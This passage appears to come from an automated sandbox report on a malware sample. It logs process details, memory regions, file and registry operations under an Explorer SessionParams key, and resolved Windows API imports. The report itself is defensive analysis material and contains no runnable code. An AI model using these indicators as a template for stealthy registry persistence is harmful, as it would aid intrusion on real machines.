| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x004cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x005d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0065ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0067ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95098 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #20: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb40 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B44
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x00387fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00390fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x00560fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x0116ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
